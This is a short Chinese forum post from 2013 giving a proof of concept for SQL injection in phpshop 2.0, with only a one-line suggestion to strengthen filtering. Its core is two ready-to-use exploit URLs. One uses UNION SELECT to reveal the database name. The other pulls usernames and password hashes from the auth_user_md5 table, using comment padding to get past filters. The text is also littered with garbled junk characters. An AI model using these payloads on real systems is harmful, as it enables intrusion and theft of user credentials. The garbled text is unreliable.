标题 : phpshop 2.0 SQL Injection Vulnerability
- x% N' S0 Q1 J! A& `# q1 h" A( J# y6 h+ m
作者 : By onestree
+ S- }2 a, Z$ h4 a6 n q下载地址 : http://code.google.com/p/phpshop/downloads/list
; x: t6 K8 S, l2 r) {; J) G测试地址: windows 7 / ubuntu1 ?. C' Y d) n9 p. F
* @% E9 ]# I3 B2 t( N9 ?& E" s
2 ]# L0 C U! r% T4 h2 I# G
SQLi p0c:
# i+ Q* T& @* S, i 5 A; [" M2 j$ J( f8 E$ Q( O; J L
==================# Z$ a+ d) C% X8 H
- T2 l/ C% c5 @# g& y. nhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
; _* V0 a& K% g% Munion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
+ M# W7 u8 ]9 v- Q. X T6 ? - k0 g1 q% t. M/ x
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& M f4 H) ]7 u" q: R- K0 X3 F
. F) Y6 m! C1 `0 i0 _0 {% R$ Q$ R修复:' {$ L/ ~( |: }; |* |6 K* e9 d
加强过滤% z, V2 [& P. Z8 ?2 p& u% u
" X- Z% b/ f& k' h8 |/ d' i- r( O# Z$ z7 u, g6 h5 @0 k3 M
|
发表于 2013-1-18 18:24:10
收藏
支持
反对